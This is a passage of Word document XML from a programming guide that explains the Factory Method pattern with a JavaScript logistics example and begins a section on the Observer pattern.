        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The Factory Method pattern is useful when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A15710" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The exact type of object to be created is not known until runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7595BF73" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The responsibility of creating objects needs to be delegated to subclasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDE994A" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You want to adhere to the Open/Closed Principle, allowing the code to be open for extension but closed for modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB5EC2"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Example Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F1F22" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Imagine you are developing a logistics application that handles the transportation of goods. Depending on the type of transport (e.g., road, sea), the application should create different types of transport objects (e.g., Truck, Ship).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433A08FC"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Basic Example in JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2960B5ED"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Product Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3016FE"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lastRenderedPageBreak/>
        <w:t>class Transport {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EEFC92"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deliver() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5C2EE8"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throw new Error("Method 'deliver()' must be implemented.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478020CB"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976F386"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0369251D"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73C17D4F"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Concrete Products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F12D3E"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Truck extends Transport {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6192F2"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deliver() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F0535"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"Delivering by land in a truck.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B87C467"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028690E4"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7F713CC3"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3634FF0D"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Ship extends Transport {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A296A05"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deliver() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D5028F"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"Delivering by sea in a ship.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CFD907"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47C5BA68"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078D11F5"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49F6A63E"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Creator Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165461E2"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Logistics {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3BC7E9"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createTransport() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167100F3"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 The factory method that subclasses will override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083E32D0"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throw new Error("Method 'createTransport()' must be implemented.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55300272"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2DDAA1B0"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3779A159"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planDelivery() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502FA6F4"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const transport = this.createTransport();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F24AD64"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transport.deliver();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1CAB7F"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FEBFCA1"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7B478FFD"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036BE582"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Concrete Creators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5064CC"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RoadLogistics extends Logistics {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7037C544"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createTransport() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2697B5C5"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new Truck();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252507FB"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8AFF19E"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30D4EE2D"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73C1FB87"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SeaLogistics extends Logistics {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB594F"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createTransport() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FE21DD"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new Ship();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7065DFFE"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0F4F02C5"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6529FDD4"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16FBAC0C"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Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50040FC4"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const roadLogistics = new RoadLogistics();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DDB003"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console.log(roadLogistics.planDelivery()); // Output: Delivering by land in a truck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B64CD0"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09ADACB8"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const seaLogistics = new SeaLogistics();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C7CA8F" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A"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console.log(seaLogistics.planDelivery()); // Output: Delivering by sea in a ship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B2C73D"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How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A92293A" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="502"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Product Interface (Transport)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Defines the general structure for the product (Transport), which requires a deliver() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54448D81" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="502"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Concrete Products (Truck, Ship)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement the Transport interface and define their specific behavior in the deliver() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F57C61" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="502"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Creator (Logistics)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Declares the factory method createTransport() which returns an object of type Transport. It also provides a method planDelivery() that uses the product created by the factory method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B1925F" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="502"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Concrete Creators (RoadLogistics, SeaLogistics)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Subclasses of Logistics that override the createTransport() method to return a specific Transport object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F490707"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Advantages of the Factory Method Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9F5A13" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="503"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Single Responsibility Principle</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The factory method separates the product creation code from the rest of the application logic, adhering to the single responsibility principle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4F967F" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="503"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Open/Closed Principle</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The code is open for extension but closed for modification. New product types can be added without changing existing code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D48E6" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="503"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Loose Coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The client code depends on the abstract interface rather than concrete classes, leading to more flexible and maintainable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF27352"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t>Disadvantages of the Factory Method Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F13D6" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="504"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Adding new classes for creators and products can increase the complexity of the code, especially for simple applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE8ED1C" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="504"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: In cases where the number of product types is small or unlikely to change, the use of the Factory Method pattern might be overkill.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDD0205" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Common Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA35227" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="505"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When the exact type of object that needs to be created is determined at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6793A84A" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="505"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When the creation logic is complex and needs to be separated from the core logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ABFE1E" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="505"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When a system needs to be open for extension by adding new product types without modifying existing code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B82D82" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C9FB77" w14:textId="7E3C5170" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="_Toc178383334"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the Observer pattern</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152"/>
    </w:p>
    <w:p w14:paraId="71FDFDD2" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Observer pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a behavioral design pattern that defines a one-to-many dependency between objects. In this pattern, one object (called the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>subject</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">) maintains a list of its dependents (called </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>observers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) and notifies them automatically of any state changes, usually by calling one of their methods. The Observer pattern is mainly used to implement distributed event-handling systems, where the subject does not need to know details about its observers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF43F8" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Concepts of the Observer Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF6379" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Subject</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The object that holds the state and sends notifications to observers when its state changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F805C1" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
